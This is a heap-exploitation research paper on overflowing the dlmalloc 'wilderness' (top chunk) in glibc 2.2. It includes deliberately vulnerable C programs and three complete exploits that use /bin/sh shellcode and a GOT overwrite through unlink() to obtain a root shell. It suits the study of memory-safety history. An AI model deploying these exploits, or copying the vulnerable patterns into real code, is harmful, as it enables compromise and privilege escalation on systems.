

------------------------------------

Exploiting The Wilderness
by Phantasmal Phantasmagoria
phantasmal@...h.ai

---- Table of Contents -------------

        1 - Introduction
          1.1 Prelude
          1.2 The wilderness
        2 - Exploiting the wilderness
          2.1 Exploiting the wilderness with malloc()
          2.2 Exploiting the wilderness with an off-by-one
        3 - The wilderness and free()
        4 - A word on glibc 2.3
        5 - Final thoughts

------------------------------------

---- Introduction ------------------

---- Prelude

This paper outlines a method of exploiting heap overflows on dlmalloc-based
glibc 2.2 systems. In situations where an overflowable buffer is
contiguous to the wilderness it is possible to achieve the aa4bmo primitive
[1].

This article is written with an x86/Linux target in mind. It is assumed
the reader is familiar with the dlmalloc chunk format and the traditional
methods of exploiting dlmalloc-based overflows [2][3]. It may be desirable
to obtain a copy of the complete dlmalloc source code from glibc itself,
as the excerpts below are simplified and may lose a degree of context.
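
For convenience, the chunk header layout assumed throughout is roughly
the following (paraphrased from glibc 2.2's malloc.c, where
INTERNAL_SIZE_T is simply size_t - 4 bytes on the x86 target):

#include <stddef.h>
typedef size_t INTERNAL_SIZE_T;

struct malloc_chunk {
        INTERNAL_SIZE_T prev_size; /* size of previous chunk, if it is free */
        INTERNAL_SIZE_T size;      /* size in bytes, including overhead     */
        struct malloc_chunk *fd;   /* forward pointer, used only if free    */
        struct malloc_chunk *bk;   /* back pointer, used only if free       */
};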

---- The wilderness

The wilderness is the top-most chunk in allocated memory. It is similar
to any normal malloc chunk - it has a chunk header followed by a
variable-length data section. The important difference lies in the fact that the
wilderness, also called the top chunk, borders the end of available memory
and is the only chunk that can be extended or shortened. This means it
must be treated specially to ensure it always exists; it must be preserved.

The wilderness is only used when a call to malloc() requests memory of
a size that no other freed chunks can facilitate. If the wilderness is
sufficiently large to handle the request it is split in two,
one part being returned for the call to malloc(), and the other becoming
the new wilderness. In the event that the wilderness is not large enough
to handle the request, it is extended with sbrk() and split as described
above. This behaviour means that the wilderness will always exist, and
furthermore, its data section will never be used. This is called wilderness
preservation, and as such the wilderness is treated as the last resort
in allocating a chunk of memory [4].

Consider the following example:

/* START wilderness.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
        char *first, *second;

        first = (char *) malloc(1020);          /* [A] */
        strcpy(first, argv[1]);                 /* [B] */

        second = (char *) malloc(1020);         /* [C] */
        strcpy(second, "polygoria!");

        printf("%p | %s\n", first, second);
}
/* END wilderness.c */

It can be logically deduced that, since no previous calls to free() have
been made, our malloc() requests are going to be serviced by the existing
wilderness chunk. The wilderness is split in two at [A]: one chunk of
1024 bytes (1020 + 4 for the size field) becomes the 'first' buffer,
while the remaining space is used for the new wilderness. This same
process happens again at [C].

Keep in mind that the prev_size field is not used by dlmalloc if the
previous chunk is allocated, and in that situation can become part of
the data of the previous chunk to decrease wastage. The wilderness chunk
does not utilize prev_size (there is no possibility of the top chunk
being consolidated) meaning it is included at the end of the 'first'
buffer at [A] as part of its 1020 bytes of data. Again, the same applies
to the 'second' buffer at [C].
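
To see this layout concretely, here is a small standalone test (the
exact spacing assumes a dlmalloc-based glibc 2.2 heap; other allocators
will behave differently):

/* adjacency.c - illustrative only */
#include <stdio.h>
#include <stdlib.h>

int main(void) {
        char *first  = (char *) malloc(1020);
        char *second = (char *) malloc(1020);

        /* On the target the two data pointers should differ by exactly
         * 1024 bytes (1020 of data plus 4 for the size field), so the
         * last 4 bytes of 'first' overlap the next chunk's prev_size. */
        printf("first=%p second=%p diff=%ld\n", (void *) first,
               (void *) second, (long) (second - first));
        return 0;
}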

The special handling of the wilderness chunk by the dlmalloc system led
Michel "MaXX" Kaempf to state in his 'Vudo malloc tricks' article [2]:
"The wilderness chunk is one of the most dangerous opponents of the
attacker who tries to exploit heap mismanagement". It is this special
handling of the wilderness that we will be manipulating in our exploits,
turning the dangerous opponent into, perhaps, an interesting conquest.

------------------------------------

---- Exploiting the wilderness -----

---- Exploiting the wilderness with malloc()

Looking at our sample code above we can see that a typical buffer overflow
exists at [B]. However, in this situation we are unable to use the traditional
unlink technique due to the overflowed buffer being contiguous to the
wilderness and the lack of a relevant call to free(). This leaves us
with the second call to malloc() at [C] - we will be exploiting the special
code used to set up our 'second' buffer from the wilderness.

Based on the knowledge that the 'first' buffer borders the wilderness,
 it is clear that not only can we control the prev_size and size elements
of the top chunk, but also a considerable amount of space after the chunk
header. This space is the top chunk's unused data area and proves crucial
in forming a successful exploit.

Let's have a look at the important chunk_alloc() code called from our
malloc() requests:

   /* Try to use top chunk */
   /* Require that there be a remainder, ensuring top always exists */
   if ((remainder_size = chunksize(top(ar_ptr)) - nb)
                < (long)MINSIZE)                        /* [A] */
   {
     ...
     malloc_extend_top(ar_ptr, nb);
     ...
   }

   victim = top(ar_ptr);
   set_head(victim, nb | PREV_INUSE);
   top(ar_ptr) = chunk_at_offset(victim, nb);
   set_head(top(ar_ptr), remainder_size | PREV_INUSE);
   return victim;

This is the wilderness chunk code. It checks to see if the wilderness
is large enough to service a request of nb bytes, then splits and recreates
the top chunk as described above. If the wilderness is not large enough
to hold the minimum size of a chunk (MINSIZE) after nb bytes are used,
 the heap is extended using malloc_extend_top():

   mchunkptr old_top = top(ar_ptr);
   INTERNAL_SIZE_T old_top_size = chunksize(old_top);   /* [B] */
   char *brk;
   ...
   char *old_end = (char*)(chunk_at_offset(old_top, old_top_size));
   ...
   brk = sbrk(nb + MINSIZE);                            /* [C] */
   ...
   if (brk == old_end) {                                /* [D] */
     ...
     old_top = 0;
   }
   ...
   /* Setup fencepost and free the old top chunk. */
   if(old_top) {                                        /* [E] */
     old_top_size -= MINSIZE;
     set_head(chunk_at_offset(old_top, old_top_size + 2*SIZE_SZ),
                0|PREV_INUSE);
     if(old_top_size >= MINSIZE) {                      /* [F] */
       set_head(chunk_at_offset(old_top, old_top_size),
                (2*SIZE_SZ)|PREV_INUSE);
       set_foot(chunk_at_offset(old_top, old_top_size), (2*SIZE_SZ));
       set_head_size(old_top, old_top_size);
       chunk_free(ar_ptr, old_top);
     } else {
       ...
     }
   }

The above is a simplified version of malloc_extend_top() containing only
the code we are interested in. We can see the wilderness being extended
at [C] with the call to sbrk(), but more interesting is the chunk_free()
request in the 'fencepost' code.

A fencepost is a space of memory set up for checking purposes [5]. In
the case of dlmalloc they are relatively unimportant, but the code above
provides the crucial element in exploiting the wilderness with malloc().
The call to chunk_free() gives us a glimpse, a remote possibility, of
using the unlink() macro in a nefarious way. As such, the chunk_free()
call is looking very interesting.

However, there are a number of conditions that we have to meet in order
to reach the chunk_free() call reliably. Firstly, we must ensure that
the if statement at [A] returns true, forcing the wilderness to be extended.
Once in malloc_extend_top(), we have to trigger the fencepost code at
[E]. This can be done by avoiding the if statement at [D]. Finally, we
must handle the inner if statement at [F] leading to the call to chunk_free().
One other problem arises in the form of the set_head() and set_foot()
calls. These could potentially destroy important data in our attack,
so we must include them in our list of things to be handled. That leaves
us with four items to consider just in getting to the fencepost chunk_free()
call.

Fortunately, all of these issues can be solved with one solution. As
discussed above, we can control the wilderness' chunk header, essentially
giving us control of the values returned from chunksize() at [A] and
[B]. Our solution is to set the overflowed size field of the top chunk
to a negative value. Let's look at why this works (a quick numeric sanity
check follows the list):

      - A negative size field would trigger the first if statement
        at [A]. This is because remainder_size is signed, and when
        set to a negative number still evaluates to less than
        MINSIZE.
      - The altered size element would be used for old_top_size,
        meaning the old_end pointer would appear somewhere other
        than the actual end of the wilderness. This means the if
        statement at [D] returns false and the fencepost code at
        [E] is run.
      - The old_top_size variable is unsigned and would appear to
        be a large positive number when set to our negative size
        field. This means the statement at [F] returns true, as
        old_top_size evaluates to be much greater than MINSIZE.
      - The potentially destructive chunk header modifying calls
        would only corrupt unimportant padding within our
        overflowed buffer as the negative old_top_size is used for
        an offset.
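
As that sanity check, here is a minimal standalone sketch (assuming
32-bit size fields as on the x86 target; the values and variable names
are only illustrative, not taken from dlmalloc itself):

/* signedcheck.c - illustrative only */
#include <stdio.h>
#include <stdint.h>

int main(void) {
        uint32_t top_size     = 0xfffffff0; /* our overflowed size, -16    */
        uint32_t nb           = 1024;       /* padded size of the request  */
        int32_t  remainder    = (int32_t)(top_size - nb);
        uint32_t old_top_size = top_size - 16; /* after -= MINSIZE at [E]  */

        /* [A]: signed comparison, a negative remainder is < MINSIZE (16) */
        printf("remainder < MINSIZE     : %d\n", remainder < 16);
        /* [F]: unsigned comparison, the same sort of value looks huge */
        printf("old_top_size >= MINSIZE : %d\n", old_top_size >= 16);
        return 0;
}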

Finally, we can reach our call to chunk_free(). Let's look at the important
bits:

   INTERNAL_SIZE_T hd = p->size;
   ...
   if (!(hd & PREV_INUSE))    /* consolidate backward */    /* [A] */
   {
     prevsz = p->prev_size;
     p = chunk_at_offset(p, -(long)prevsz);                 /* [B] */
     sz += prevsz;

     if (p->fd == last_remainder(ar_ptr))
       islr = 1;
     else
       unlink(p, bck, fwd);
   }

The call to chunk_free() is made on old_top (our overflowed wilderness)
meaning we can control p->prev_size and p->size. Backward consolidation
is normally used to merge two free chunks together, but we will be using
it to trigger the unlink() bug.
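
For reference, the unlink() macro in glibc 2.2 is essentially the
following (there were no pointer integrity checks at the time):

   /* Take a chunk P off its doubly-linked free list. With both fd and
    * bk under our control this becomes a 4-byte write: the word at
    * FD + 12 (FD->bk) is set to BK, and the word at BK + 8 (BK->fd)
    * is set to FD. */
   #define unlink(P, BK, FD)                            \
   {                                                    \
     BK = P->bk;                                        \
     FD = P->fd;                                        \
     FD->bk = BK;                                       \
     BK->fd = FD;                                       \
   }

This is why the exploits below set the fake fwd pointer to the target
return location minus 12, and start execution at the return address with
a short jump over the word that unlink() tramples.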

Firstly, we need to ensure the backward consolidation code is run at
[A]. As we can control p->size, we can trigger backward consolidation
simply by clearing the overflowed size element's PREV_INUSE bit. From
here, it is p->prev_size that becomes important. As mentioned above,
p->prev_size is actually part of the buffer we're overflowing.

Exploiting dlmalloc by using backwards consolidation was briefly considered
in the article 'Once upon a free()' [3]. The author suggests that it
is possible to create a 'fake chunk' within the overflowed buffer - that
is, a fake chunk relatively negative to the overflowed chunk header.
This would require setting p->prev_size to a small positive number which
in turn gets complemented into its negative counterpart at [B] (digression:
please excuse my stylistic habit of replacing the more technically correct
"two's complement" with "complement"). However, such a small positive
number would likely contain NULL terminating bytes, effectively ending
our payload before the rest of the overflow is complete.
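
A trivial illustration of the NULL byte problem (assuming 32-bit values,
as on the x86 target):

/* nulcheck.c - illustrative only */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

int main(void) {
        int32_t small_positive = 16;  /* 0x00000010 */
        int32_t small_negative = -4;  /* 0xfffffffc */

        /* strcpy() in the vulnerable program stops at the first NULL
         * byte, so only the NULL-free negative value can sit in the
         * middle of our payload. */
        printf("16 contains a NULL byte: %s\n",
               memchr(&small_positive, 0, sizeof(small_positive)) ? "yes" : "no");
        printf("-4 contains a NULL byte: %s\n",
               memchr(&small_negative, 0, sizeof(small_negative)) ? "yes" : "no");
        return 0;
}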

This leaves us with one other choice: creating a fake chunk relatively
positive to the start of the wilderness. This can be achieved by setting
p->prev_size to a small negative number, turned into a small positive
number at [B]. This would require the specially crafted forward and back
pointers to be situated at the start of the wilderness' unused data area,
just after the chunk header. Similar to the overflowed size variable
discussed above, this is convenient as the negative number need not contain
NULL bytes, allowing us to continue the payload into the data area.

For the sake of the exploit, let's go with a prev_size of -4 or 0xfffffffc
and an overflowed size of -16 or 0xfffffff0. Clearly, our prev_size will
get turned into an offset of 4, essentially passing the point 4 bytes
past the start of the wilderness (the start being the prev_size element
itself) to the unlink() macro. This means that our fake fwd pointer will
be at the wilderness + 12 bytes and our bck pointer at the wilderness
+ 16 bytes. An overflowed size of -16 places the chunk header modifying
calls safely into our padding, while still satisfying all of our other
requirements. Our payload will look like this:

|...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPPPP|SSSSWWWWFFFFBBBBWWWWWWWW...|

A = Target buffer that we control. Some of this will be trashed by
    the chunk header modifying calls, important when considering
    shellcode placement.
P = The prev_size element of the wilderness chunk. This is part of
    our target buffer. We set it to -4.
S = The overflowed size element of the wilderness chunk. We set it
    to -16.
W = Unimportant parts of the wilderness.
F = The fwd pointer for the call to unlink(). We set it to the
    target return location - 12.
B = The bck pointer for the call to unlink(). We set it to the
    return address.

We're now ready to write our exploit for the vulnerable code discussed
above. Keep in mind that a malloc request for 1020 is padded up to 1024
to make room for the size field, so we are exactly contiguous to the
wilderness.

$ gcc -o wilderness wilderness.c
$ objdump -R wilderness | grep printf
08049650 R_386_JUMP_SLOT   printf
$ ./wilderness 123
0x8049680 | polygoria!

/* START exploit.c */
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define RETLOC  0x08049650 /* GOT entry for printf */
#define RETADDR 0x08049680 /* start of 'first' buffer data */

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[]) {
        char *p, *payload = (char *) malloc(1052);

        p = payload;
        memset(p, '\x90', 1052);

        /* Jump 12 ahead over the trashed word from unlink() */
        memcpy(p, "\xeb\x0c", 2);

        /* We put the shellcode safely away from the possibly
	 * corrupted area */
        p += 1020 - 64 - sizeof(shellcode);
        memcpy(p, shellcode, sizeof(shellcode) - 1);

        /* Set up the prev_size and overflow size fields */
        p += sizeof(shellcode) + 64 - 4;
        *(long *) p = -4;
        p += 4;
        *(long *) p = -16;

        /* Set up the fwd and bck of the fake chunk */
        p += 8;
        *(long *) p = RETLOC - 12;
        p += 4;
        *(long *) p = RETADDR;

        p += 4;
        *(p) = '\0';

        execl("./wilderness", "./wilderness", payload, NULL);
}
/* END exploit.c */

$ gcc -o exploit exploit.c
$ ./exploit
sh-2.05a#

---- Exploiting the wilderness with an off-by-one

Let's modify our original vulnerable code to contain an off-by-one condition:

/* START wilderness2.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
        char *first, *second;
        int x;

        first = (char *) malloc(1020);

        for(x = 0; x <= 1020 && argv[1][x] != '\0'; x++)    /* [A] */
                first[x] = argv[1][x];

        second = (char *) malloc(2020);                     /* [B] */
        strcpy(second, "polygoria!");

        printf("%p %p | %s\n", first, argv[1], second);
}
/* END wilderness2.c */

Looking at this sample code we can see the off-by-one error occurring
at [A]. The loop copies up to 1021 bytes of argv[1] into a buffer, 'first',
allocated only 1020 bytes. As the 'first' buffer was split off the top
chunk in its allocation, it is exactly contiguous to the wilderness.
This means that our one byte overflow destroys the least significant
byte of the top chunk's size field.
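
To make the single byte corruption concrete, consider a hypothetical
wilderness size field before and after the overflow (the starting value
is made up; only the effect on the low byte matters):

/* lsbcheck.c - illustrative only */
#include <stdio.h>
#include <stdint.h>

int main(void) {
        uint32_t top_size   = 0x00000f09;                 /* hypothetical size, PREV_INUSE set */
        uint32_t overflowed = (top_size & ~0xffU) | 0x02; /* off-by-one writes 0x02 over LSB   */

        printf("before: %#010x  PREV_INUSE=%u\n", top_size, top_size & 1u);
        printf("after : %#010x  PREV_INUSE=%u\n", overflowed, overflowed & 1u);
        return 0;
}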

When exploiting off-by-one conditions involving the wilderness we will
use a similar technique to that discussed above in the malloc() section;
we want to trigger malloc_extend_top() in the second call to malloc()
and use the fencepost code to cause an unlink() to occur. However, there
are a couple of important issues that arise further to those discussed
above.

The first new problem is found in trying to trigger malloc_extend_top()
from the wilderness code in chunk_alloc(). In order to force the heap
to extend, the size of the wilderness minus the padded size of our second
request (2020, padded to 2024) needs to be less than MINSIZE (16). When
we controlled the entire size field in the section above this was not a
problem, as we could easily set a value less than 16, but since we can
only control the least significant byte of the wilderness' size field we
can only decrease the size by a limited amount. This means that in some
situations where the wilderness is too big we cannot trigger the heap
extension code. Fortunately, it is common in real world situations to
have some sort of control over the size of the wilderness through attacker
induced calls to malloc().

Assuming that our larger second request to malloc() will attempt to extend
the heap, we now have to address the other steps in running the fencepost
chunk_free() call. We know that we can comfortably reach the fencepost
code as we are modifying the size element of the wilderness. The inner
if statement leading to the chunk_free() is usually triggered since either
our old_top_size is greater than 16, or the wilderness' size is small
enough that controlling the least significant byte is enough to make
old_top_size wrap around when MINSIZE is subtracted from it. Finally,
the chunk header modifying calls are unimportant, so long as they occur
in allocated memory so as to avoid a premature segfault. The reason for
this will become clear in a short while. All we have left to do is to
ensure that the PREV_INUSE bit is cleared for backwards consolidation
at the chunk_free(). This is made trivial by our control of the size
field.

Once again, as we reach the backward consolidation code it is the prev_size
field that becomes important. We have already determined that we have
to use a negative prev_size value to ensure our payload is not terminated
by stray NULL bytes. The negative prev_size field causes the backward
consolidation chunk_at_offset() call to use a positive offset from the
start of the wilderness. However, unlike the above situation we do not
control any of the wilderness after the overflowed least significant
byte of the size field. Knowing that we can only go forward in memory
at the consolidation and that we don't have any leverage on the heap,
 we have to shift our attention to the stack.

The stack may initially seem to be an unlikely factor when considering
a heap overflow, but in our case, where we can only increase the values
passed to unlink(), it becomes quite convenient, especially in a local
context. Stack addresses are much higher in memory than their heap
counterparts, and by correctly setting the prev_size field of the
wilderness we can force an unlink() to occur somewhere on the stack.
That somewhere will be our payload as it sits in argv[1]. Using this
heap-to-stack unlink() technique any possible corruption of our payload
in the heap by the chunk header modifying calls is inconsequential to
our exploit; the heap is only important in triggering the actual overflow,
while the values for unlink() and the execution of our shellcode can be
handled on the stack.

The correct prev_size value can be easily calculated when exploiting
a local vulnerability. We can discover the address of both argv[1] and
the 'first' buffer by simulating our payload and using the output of
running the vulnerable program. We also know that our prev_size will
be complemented into a positive offset from the start of the wilderness.
To reach argv[1] at the chunk_at_offset() call we merely have to subtract
the address of the start of the wilderness (the end of the 'first' buffer
minus 4 for prev_size) from the address of argv[1], then complement the
result. This leaves us with the following payload:

|FFFFBBBBDDDDDDDDD...DDDDDDDDPPPP|SWWWWWWWWWWW...|

F = The fwd pointer for the call to unlink(). We set it to the
    target return location - 12.
B = The bck pointer for the call to unlink(). We set it to the
    return address.
D = Shellcode and NOP padding, where we will return in argv[1].
S = The overflowed byte in the size field of the wilderness. We set
    it to the lowest possible value that still clears PREV_INUSE, 2.
W = Unimportant parts of the wilderness.
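
As a worked example of the prev_size calculation described above, here
is a quick sketch using the concrete 'first' and argv[1] addresses taken
from the test run shown further below:

/* prevsize.c - illustrative only */
#include <stdio.h>

#define ARGV1 0xbffffac9UL /* start of argv[1], from the test run below */
#define FIRST 0x080496b0UL /* start of 'first', from the same test run  */

int main(void) {
        /* The wilderness starts at the end of 'first' minus 4, so its
         * prev_size overlaps the last 4 bytes of the buffer. We want
         * the fake chunk 8 bytes before argv[1] so that its fd and bk
         * fields land exactly on the F and B words of the payload. */
        unsigned long wilderness = FIRST + 1016;
        unsigned long fake_chunk = ARGV1 - 8;
        long prev_size = -(long)(fake_chunk - wilderness);

        printf("prev_size = %ld (%#lx)\n", prev_size,
               (unsigned long) prev_size);
        printf("check: wilderness + |prev_size| = %#lx (argv[1] - 8 = %#lx)\n",
               wilderness + (unsigned long) (-prev_size), fake_chunk);
        return 0;
}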

$ gcc -o wilderness2 wilderness2.c
$ objdump -R wilderness2 | grep printf
08049684 R_386_JUMP_SLOT    printf

/* START exploit2.c */
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define RETLOC 0x08049684 /* GOT entry for printf */
#define ARGV1 0x01020304 /* start of argv[1], handled later */
#define FIRST 0x04030201 /* start of 'first', also handled later */

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[]) {
        char *p, *payload = (char *) malloc(1028);
        long prev_size;

        p = payload;
        memset(p, '\x90', 1028);
        *(p + 1021) = '\0';

        /* Set the fwd and bck for the call to unlink() */
        *(long *) p = RETLOC - 12;
        p += 4;
        *(long *) p = ARGV1 + 8;
        p += 4;

        /* Jump 12 ahead over the trashed word from unlink() */
        memcpy(p, "\xeb\x0c", 2);

        /* Put shellcode at end of NOP sled */
        p += 1012 - 4 - sizeof(shellcode);
        memcpy(p, shellcode, sizeof(shellcode) - 1);

        /* Set up the special prev_size field. We actually want to
         * end up pointing to 8 bytes before argv[1] to ensure the
         * fwd and bck are hit right, so we add 8 before
         * complementing. */
        prev_size = -(ARGV1 - (FIRST + 1016)) + 8;
        p += sizeof(shellcode);
        *(long *) p = prev_size;

        /* Allow for a test condition that will not segfault the
         * target when getting the address of argv[1] and 'first'.
         * With 0xff malloc_extend_top() returns early due to error
         * checking. 0x02 is used to trigger the actual overflow. */
        p += 4;
        if(argc > 1)
                *(char *) p = 0xff;
        else
                *(char *) p = 0x02;

        execl("./wilderness2", "./wilderness2", payload, NULL);
}
/* END exploit2.c */

$ gcc -o exploit2 exploit2.c
$ ./exploit2 test
0x80496b0 0xbffffac9 | polygoria!
$ cat > diffex
6,7c6,7
< #define ARGV1 0x01020304 /* start of argv[1], handled later */
< #define FIRST 0x04030201 /* start of 'first', also handled later */
---
> #define ARGV1 0xbffffac9 /* start of argv[1] */
> #define FIRST 0x080496b0 /* start of 'first' */
$ patch exploit2.c diffex
patching file exploit2.c
$ gcc -o exploit2 exploit2.c
$ ./exploit2
sh-2.05a#

------------------------------------

---- The wilderness and free() -----

Let's now consider the following example:

/* START wilderness3a.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
        char *first, *second;

        first = (char *) malloc(1020);
        strcpy(first, argv[1]);
        free(first);

        second = (char *) malloc(1020);
}
/* END wilderness3a.c */

Unfortunately, this situation does not appear to be exploitable. When
exploiting the wilderness, calls to free() are your worst enemy. This
is because chunk_free() handles situations directly involving the
wilderness with different code from the normal backward or forward
consolidation. Although this special 'top' code has its weaknesses, it
does not seem possible either to directly exploit the call to free() or
to survive it in a way that allows exploitation of the following call
to malloc(). For those interested, let's have a quick look at why:

   INTERNAL_SIZE_T hd = p->size;
   INTERNAL_SIZE_T sz;
   ...
   mchunkptr next;
   INTERNAL_SIZE_T nextsz;
   ...

   sz = hd & ~PREV_INUSE;
   next = chunk_at_offset(p, sz);
   nextsz = chunksize(next);                    /* [A] */

   if (next == top(ar_ptr))
   {
     sz += nextsz;                              /* [B] */

     if (!(hd & PREV_INUSE))                    /* [C] */
     {
       ...
     }

     set_head(p, sz | PREV_INUSE);              /* [D] */
     top(ar_ptr) = p;
     ...
   }

Here we see the code from chunk_free() used to handle requests involving
the wilderness. Note that the backward consolidation within the 'top'
code at [C] is uninteresting as we do not control the needed prev_size
element. This leaves us with the hope of using the following call to
malloc() as described above.

In this situation we control the value of nextsz at [A]. We can see that
the chunk being freed is consolidated with the wilderness. We can control
the new wilderness' size as it is adjusted with our nextsz at [B], but
unfortunately, the PREV_INUSE bit is set at the call to set_head() at
[D]. The reason this is a bad thing becomes clear when considering the
possibilities of using backward consolidation in any future calls to
malloc(); the PREV_INUSE bit needs to be cleared.

Keeping with the idea of exploiting the following call to malloc() using
the fencepost code, there are a few other options - all of which appear
to be impossible. Firstly, forward consolidation. This is made unlikely
by the fencepost chunk header modifying calls discussed above, as they
usually ensure that the test for forward consolidation will fail. The
frontlink() macro has been discussed [2] as another possible method of
exploiting dlmalloc, but since we do not control any of the traversed
chunks this technique is uninteresting. The final option was to use the
fencepost chunk header modifying calls to partially overwrite a GOT entry
to point into an area of memory we control. Unfortunately, all of these
modifying calls are aligned, and there doesn't seem to be anything else
we can do with the values we can write.

Now that we have determined what is impossible, let's have a look at
what we can do when involving the wilderness and free():

/* START wilderness3b.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
        char *first, *second;

        first = (char *) malloc(1020);
        second = (char *) malloc(1020);
        strcpy(second, argv[1]);                /* [A] */
        free(first);                            /* [B] */
        free(second);
}
/* END wilderness3b.c */

The general aim of this contrived example is to avoid the special 'top'
code discussed above. The wilderness can be overflowed at [A], but this
is directly followed by a call to free(). Fortunately, the chunk to be
freed is not bordering the wilderness, and thus the 'top' code is not
invoked. To exploit this we will be using forward consolidation at [B],
 the first call to free().

   /* consolidate forward */
   if (!(inuse_bit_at_offset(next, nextsz)))
   {
     sz += nextsz;

     if (!islr && next->fd == last_remainder(ar_ptr)) {
       ...
     }
     else
       unlink(next, bck, fwd);

     next = chunk_at_offset(p, sz);
   }
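
For reference, the inuse_bit_at_offset() test on the first line is
essentially the following macro from dlmalloc; it reads the PREV_INUSE
bit of the chunk that starts s bytes beyond p:

   #define inuse_bit_at_offset(p, s) \
     (((mchunkptr)(((char *)(p)) + (s)))->size & PREV_INUSE)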

At the first call to free(), 'next' points to our 'second' buffer. This
means that the test for forward consolidation looks at the size value
of the wilderness. To trigger the unlink() on 'next' (the 'second'
buffer) we need to overflow the wilderness' size field to clear the
PREV_INUSE bit. Our payload will look like this:

|FFFFBBBBDDDDDDDD...DDDDDDDD|SSSSWWWWWWWWWWWWWWWW...|

F = The fwd pointer for the call to unlink(). We set it to the
    target return location - 12.
B = The bck pointer for the call to unlink(). We set it to the
    return address.
D = Shellcode and NOP padding, where we will return.
S = The overflowed size field of the wilderness chunk. A value
    of -4 will do.
W = Unimportant parts of the wilderness.

We're now ready for an exploit.

$ gcc -o wilderness3b wilderness3b.c
$ objdump -R wilderness3b | grep free
0804962c R_386_JUMP_SLOT   free
$ ltrace ./wilderness3b 1986 2>&1 | grep malloc | tail -n 1
malloc(1020)                                       = 0x08049a58

/* START exploit3b.c */
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define RETLOC  0x0804962c /* GOT entry for free */
#define RETADDR 0x08049a58 /* start of 'second' buffer data */

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[]) {
        char *p, *payload = (char *) malloc(1052);

        p = payload;
        memset(p, '\x90', 1052);

        /* Set up the fwd and bck pointers to be unlink()'d */
        *(long *) p = RETLOC - 12;
        p += 4;
        *(long *) p = RETADDR + 8;
        p += 4;

        /* Jump 12 ahead over the trashed word from unlink() */
        memcpy(p, "\xeb\x0c", 2);

        /* Position shellcode safely at end of NOP sled */
        p += 1020 - 8 - sizeof(shellcode) - 32;
        memcpy(p, shellcode, sizeof(shellcode) - 1);

        p += sizeof(shellcode) + 32;
        *(long *) p = -4;

        p += 4;
        *(p) = '\0';

        execl("./wilderness3b", "./wilderness3b", payload, NULL);
}
/* END exploit3b.c */

$ gcc -o exploit3b exploit3b.c
$ ./exploit3b
sh-2.05a#

------------------------------------

---- A word on glibc 2.3 -----------

Although exploiting our examples on a glibc 2.3 system would be an
interesting activity, it does not appear possible to utilize the
techniques described above. Specifically, although the fencepost code
exists on both platforms, the situations surrounding it are vastly
different.

For those genuinely interested in a more detailed explanation of the
difficulties involving the fencepost code on glibc 2.3, feel free to
contact me.

------------------------------------

---- Final thoughts ----------------

An overflow involving the wilderness on a glibc 2.2 platform might seem
a rare or esoteric occurrence. However, the research presented above was
not prompted by divine inspiration, but in response to a tangible need.
Thus it was not so much important substance that inclined me to release
this paper, but rather the hope that obscure substance might be reused
for some creative good by another.

------------------------------------

[1] http://www.phrack.org/show.php?p=61&a=6
[2] http://www.phrack.org/show.php?p=57&a=8
[3] http://www.phrack.org/show.php?p=57&a=9
[4] http://gee.cs.oswego.edu/dl/html/malloc.html
[5] http://www.memorymanagement.org/glossary/f.html#fencepost

------------------------------------




